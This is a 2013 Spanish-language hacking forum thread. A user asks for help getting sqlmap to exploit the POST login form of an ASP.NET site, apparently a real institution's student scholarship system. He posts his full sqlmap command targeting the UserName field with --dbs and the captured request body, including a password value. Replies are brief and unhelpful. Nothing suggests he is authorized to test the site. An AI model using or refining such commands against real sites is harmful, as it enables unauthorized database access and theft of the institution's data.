[SOLUCIONADO] SQLmap POST

Iniciado por maxlife, Julio 13, 2013, 10:17:25 PM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 13, 2013, 10:17:25 PM Ultima modificación: Noviembre 03, 2013, 10:41:47 AM por Expermicid
hola amigos tengo un incoveniente con una sql en method post SQLMAP

se que la web es vulnverable a sql y sql blind mi codigo es el siguente estoy bajo windows 7

sqlmap.py -u "https://webexplotable/login.aspx" --data="ctl00%24ContentPlaceHolder1%24btnSalir=Salir%20del%20Sistema&ctl00%24ContentPlaceHolder1%24cmbmodo=ADMINISTRATIVO&ctl00%24ContentPlaceHolder1%24LoginButton=Ingresar%20al%20Sistema&ctl00%24ContentPlaceHolder1%24Password=acUn3t1x&ctl00%24ContentPlaceHolder1%24UserName=&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=" - P" UserName"= --level=5 --risk=5 --dbs


URL encoded POST input ctl00%24ContentPlaceHolder1%24UserName was set to 1'" aqui me dice que campo es vulnverable pero no se que pasa mire el POST con el live hearders

y es este


ctl00%24ContentPlaceHolder1%24btnSalir=Salir%20del%20Sistema&ctl00%24ContentPlaceHolder1%24cmbmodo=ADMINISTRATIVO&ctl00%24ContentPlaceHolder1%24LoginButton=Ingresar%20al%20Sistema&ctl00%24ContentPlaceHolder1%24Password=acUn3t1x&ctl00%24ContentPlaceHolder1%24UserName=&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWCwKnyoL%2bBwLpna7PDQKOg6mZCwLh1rXpCQLQgozABAKPpLWXBwLU2IP0DQLN49KjCQLo0YK0CQKh5%2fXjDQKckbKHC27CZUGKz1akLj6PFyG9vRwXHXNP&__LASTFOCUS=&__VIEWSTATE=%2fwEPDwUKMTM1MjAxMzAzNw9kFgJmD2QWAgIDD2QWAgIBD2QWBgIDDw8WAh4EVGV4dAUfTUnDiVJDT0xFUywgMTAgREUgSlVMSU8gREUgMjAxM2RkAgUPDxYCHwAFogQ8Yj5CZWNhcyB5IERlc2N1ZW50b3MgMjAxMy1CIEVYVFJBT1JESU5BUklBUzwvYj48L2JyPlNBRXcgKE9wY2nDs24gSW5mb3JtYWNpw7NuIEVzdHVkaWFudGlsLT5CaWVuZXN0YXIgRXN0dWRpYW50aWwtPlNvbGljaXR1ZCBCZWNhcy1EZXNjdWVudG9zKTwvYnI%2bIDxiPkRFTCAwOSBBTCAxOSBERSBKVUxJTzwvYj4gU29saWNpdHVkIGRlIEJlY2FzIHkgRGVzY3VlbnRvcyA8L2JyPiA8Yj5ERUwgMjIgQUwgMjYgREUgSlVMSU88L2I%2bPC9icj5WZXJpZmljYWNpw7NuIGRlIEluZm9ybWFjacOzbjwvYnI%2bPGI%2bREVMIDI5IEFMIDAyIERFIEFHT1NUTzwvYj48L2JyPkNvbmNlc2nDs24gZGUgQmVjYXMgeSBGaXJtYSBkZSBDb250cmF0b3MgZW4gRHB0by4gZGUgQmllbmVzdGFyIEVzdHVkaWFudGlsIHBhcmEgQmVjYXMgZGUgQ29sZWdpYXR1cmEsIFBvc3RncmFkbyB5IERlc2N1ZW50b3MgZGUgSGVybWFub3MgZSBIaWpvcy4gPC9icj5QYXJhIGxhcyBkZW3DoXMgQmVjYXMgZWwgcHJvY2VzbyBzZXLDoSBhIHBhcnRpciBkZWwgPGI%2bMTQgQWdvc3RvIGRlbCAyMDEzPC9iPi5kZAIID2QWAmYPZBYKAgEPEA8WBh4NRGF0YVRleHRGaWVsZAUETW9kbx4ORGF0YVZhbHVlRmllbGQFBE1vZG8eC18hRGF0YUJvdW5kZ2QQFQUOQURNSU5JU1RSQVRJVk8JQVNQSVJBTlRFDkNVUlNPQURJQ0lPTkFMCkVTVFVESUFOVEUIUFJPRkVTT1IVBQ5BRE1JTklTVFJBVElWTwlBU1BJUkFOVEUOQ1VSU09BRElDSU9OQUwKRVNUVURJQU5URQhQUk9GRVNPUhQrAwVnZ2dnZxYBZmQCBQ8QZGQWAWZkAhUPDxYEHglCYWNrQ29sb3IKpAEeBF8hU0ICCGRkAhcPZBYCZg9kFgoCAQ8PFgIeB1Zpc2libGVoZGQCCQ8QZGQWAGQCCw8QZGQWAGQCDQ8QZGQWAGQCDw8QZGQWAGQCHg8PZBYCHgdvbmNsaWNrBRxqYXZhc2NyaXB0OmNsb3N5bm9zaG93c21lKCk7ZGQVjZyfA5ZDIT4vXc2ucDkOvTT7IQ%3d%3d


mi pregunta es debo escribir todo eso o lo dejo como lo estoy haciendo ya que no explota el sql muchas gracias a todos espero Respuesta
Julio 16, 2013, 03:50:49 PM #1
Es simple, si no explota sql es que hay algo mal xDD

Un saludo.


Agosto 04, 2013, 12:31:29 PM #2
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Eso pense  ;D

Pasate por aquí: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Imprimir
Ir Arriba Páginas1
Acciones del Usuario